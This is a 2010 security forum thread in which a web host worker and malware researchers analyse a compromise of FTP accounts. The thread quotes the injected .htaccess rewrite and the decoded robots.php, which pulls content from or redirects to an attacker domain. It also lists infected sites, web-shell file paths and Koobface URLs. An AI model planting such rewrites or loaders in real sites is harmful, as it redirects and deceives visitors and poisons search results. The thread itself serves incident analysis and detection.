Author Topic: robots.txt redirects to svainefler.info  (Read 4837 times)

0 Members and 1 Guest are viewing this topic.

May 20, 2010, 07:21:45 am
Read 4837 times

foks

  • Jr. Member

  • Offline
  • **

  • 14
I work on a pretty large web hosting company. Some days ago a lot of FTP accounts got attacked.

In .htaccess these rows where added:
RewriteEngine Off
RewriteEngine On
RewriteBase /
RewriteRule robots\.txt$ includ2e/robots.php [R=301,L]

Robots.php has base64-encoded data, which translates into this:
$fid = '4506';

$gto="http://get.svainefler.info/g-f/?asd=".$fid."&url=".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$res=file_get_contents($gto);                                                         
if (!$res) header ("Location: ".$gto);else  echo "Redirecting...";

One more file is uploaded, this file simply runs any php commands you post to the file.

http://get.svainefler.info/g-f/ gives "Account closed" but that might be because I try with the wrong user agent.

Does anyone know the purpose of this attack? As far as I know robots.txt can only be used to block pages from being indexed.

May 20, 2010, 08:23:09 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Would you please post Robots.php and the other file in a password protected zip file ?

What is the location of the other file ?
Ruining the bad guy's day

May 20, 2010, 09:42:31 am
Reply #2

foks

  • Jr. Member

  • Offline
  • **

  • 14
Zip file password: 123456
I have added all files that were uploaded.

May 20, 2010, 11:05:38 am
Reply #3

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
Now that is interesting.

The following subdomains resolve, svainefler.info doesnt:
get.svainefler.info
5716.svainefler.info
my.svainefler.info

I could not find anything interesting there, except of
Code: [Select]
403 http://get.svainefler.info/1/
but that doesnt help much :D

Code: [Select]
Domain: svainefler.info
 Reg: contact@privacyprotect.org
IP: 111.221.47.137
 RDNS:
 ASN: 24312 (SG)

According to a quick google search the following websites are infected:
Code: [Select]
http://www.ligaloto.com/includ2e/robots.php
http://www.horsez.be/
http://www.jotya.com/
http://www.achatmaroc.com/
http://www.josef-neuhauser.at/includ2e/robots.php
http://www.budgettyres.plus.com/
http://www.dsquared.com/includ2e/robots.php
http://users.telenet.be/stippi/

with the following path/file combinations seen:
Code: [Select]
/includ2e/14mg.php
/includ2e/c7ss.php
/includ2e/robots.php
/includ2e/sty6le.php
/includ2e/temp9lates.php
/includ2e/us8ers.php

/2wu/1nc.php
/2wu/robots.php

/5pf/1mg.php
/5pf/robots.php

/7a/_cache.php
/7a/robots.php

/pw/media_.php
/pw/robots.php

/yzs18yzy7/c1ass.php
/yzs18yzy7/robots.php

On a side note (probably irrelevant here):
Koobface
Code: [Select]
http://www.achatmaroc.com/.sys/
http://www.jotya.com/.sys/

May 20, 2010, 11:21:34 am
Reply #4

foks

  • Jr. Member

  • Offline
  • **

  • 14
On a side note (probably irrelevant here):
Koobface
Code: [Select]
http://www.achatmaroc.com/.sys/
http://www.jotya.com/.sys/

Yeah, some of the accounts I found had been infected by Koobface since March but for some reason these Koobface pages were never accessed.

May 20, 2010, 12:48:39 pm
Reply #5

Kimberly

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 13
You might need the full URL + params to get content

Code: [Select]
http://get.svainefler.info/g-f/?asd=4506&url=http://example.com/index.html

May 20, 2010, 12:56:07 pm
Reply #6

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
You might need the full URL + params to get content

Code: [Select]
http://get.svainefler.info/g-f/?asd=4506&url=http://example.com/index.html
I think you need a php useragent too.
Ruining the bad guy's day

May 20, 2010, 01:27:07 pm
Reply #7

foks

  • Jr. Member

  • Offline
  • **

  • 14
You might need the full URL + params to get content

Code: [Select]
http://get.svainefler.info/g-f/?asd=4506&url=http://example.com/index.html
I think you need a php useragent too.

PHPs useragent is empty by default (http://www.electrictoolbox.com/php-change-user-agent-string/), I tried with:
wget -U "" "http://get.svainefler.info/g-f/?asd=4506&url=http://www.jotya.com/yzs18yzy7/robots.php"
but the only result is:
Account closed

I also checked with an url where I know that 4506 is the asd number the url use.

May 21, 2010, 10:40:52 am
Reply #8

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Only taken a quick look so far but;

Code: [Select]
http://www.jotya.com/.sys/dat/
.sys confirms Koobface.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 24, 2010, 06:28:03 pm
Reply #9

RichardW

  • Newbie

  • Offline
  • *

  • 2
This looks like a 2 part attack.  robots.txt by its very nature is publicly available, and accessed A LOT by crawlers.  The robots.php includes a flag.  If the script can't execute, it at least poisons the site's referral stats (unsuspecting webmaster can click on this), and if it can execute, its possibly poisoning the search engine results due to the use of a 301 Permanent redirect.

You see that in the robots.php they're executing/decoding on the fly due to the use of echo(base64_decode()).  I'm sure this is obfuscating against ids inspection.  But that's okay, now we can just look for the use of base64_decode in robots.*   ;D

May 24, 2010, 06:41:35 pm
Reply #10

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net